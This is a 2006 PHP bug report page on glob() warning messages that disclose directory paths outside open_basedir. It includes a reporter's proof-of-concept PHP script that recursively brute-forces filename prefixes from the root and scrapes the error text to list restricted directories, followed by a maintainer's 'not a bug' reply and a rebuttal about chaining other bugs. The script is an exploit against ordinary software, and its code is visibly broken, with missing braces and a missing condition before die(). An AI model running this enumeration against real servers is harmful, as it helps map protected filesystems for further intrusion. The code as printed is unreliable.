|  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #39339 Bug in warning message when glob() function access to unallowed path.
Submitted: 2006-11-01 22:30 UTC Modified: 2006-11-03 21:22 UTC
From: anton dot kirsanov at gmail dot com Assigned:
Status: Not a bug Package: Safe Mode/open_basedir
PHP Version: 5.1.6 OS: ALL
Private report: No CVE-ID: None
 [2006-11-01 22:30 UTC] anton dot kirsanov at gmail dot com
When open_basedir is enabled, glob() function don`t show files in unallowed directories, however in warning message present file or directory name that access is denied. 
If you recursive parse a warning messages for extract pathes, you a get listing of unallowed directories (see POC code). 

I`m, tested this bug on PHP 5.1.6 and 4.4.4, everywhere the result is equal. 

Reproduce code:
	// -----------------------------------------------------
	// POC by Kirsanov Anton ( anton.kirsanov[at] )
	// Description:
	// Bug in warning message for glob() function allow show listing unallowed directories when open_basedir is enabled.
	// Risk:
	// Possible directory listing, when open_basedir is enabled.
	// Testing on PHP 4.4.4, 5.1.6.

	ini_set("display_errors", 0); 
	ini_set("track_errors", 1); 

		die('open_basedir not present');

	$chars = "._-1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
	$z = array();

	get_c("/", $z);

        // show contents of root directory

	function get_c($path, &$o)
		global $chars;
		for($i=0; $i < strlen($chars); $i++)
			$p = $path . $chars[$i];
			$r = glob($p . "*");
			if(!$r && $php_errormsg)
				if((	preg_match("/open\_basedir restriction in effect\. File\((.*)\) is/iU", $php_errormsg, $t) ||
					preg_match("/is not allowed to access (.*) owned/iU", $php_errormsg, $t)) && !$o[$t[1]])
					$o[$t[1]] = $t[2];					get_c($p, $o);

Expected result:

Warning: glob(): open_basedir restriction in effect.
is not allowed to access (/) owned ...

Actual result:

Warning: glob(): open_basedir restriction in effect.
is not allowed to access (/bin/) owned ...

Warning message has been disclose path - /bin/


Add a Patch

Pull Requests

Add a Pull Request


AllCommentsChangesGit/SVN commitsRelated reports
 [2006-11-03 19:40 UTC]
Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at and the instructions on how to report
a bug at

Everytime PHP fails to open a file due to safe_mode/
open_basedir it returns an error saying cannot open so & so 
due to safe_mode. 

You don't gain the ability to write to files and/or open them, 
so there is no security issue here.
 [2006-11-03 21:22 UTC] anton dot kirsanov at gmail dot com
sorry, this a bug. 
if i know a fullpath to files in unallowed directories, i`m must used a many others php bugs (some curl bug, zlib compress file read bug) for read unallowed files. this a design bug in security architecture.
PHP Copyright © 2001-2019 The PHP Group
All rights reserved.
Last updated: Sun Aug 25 01:01:28 2019 UTC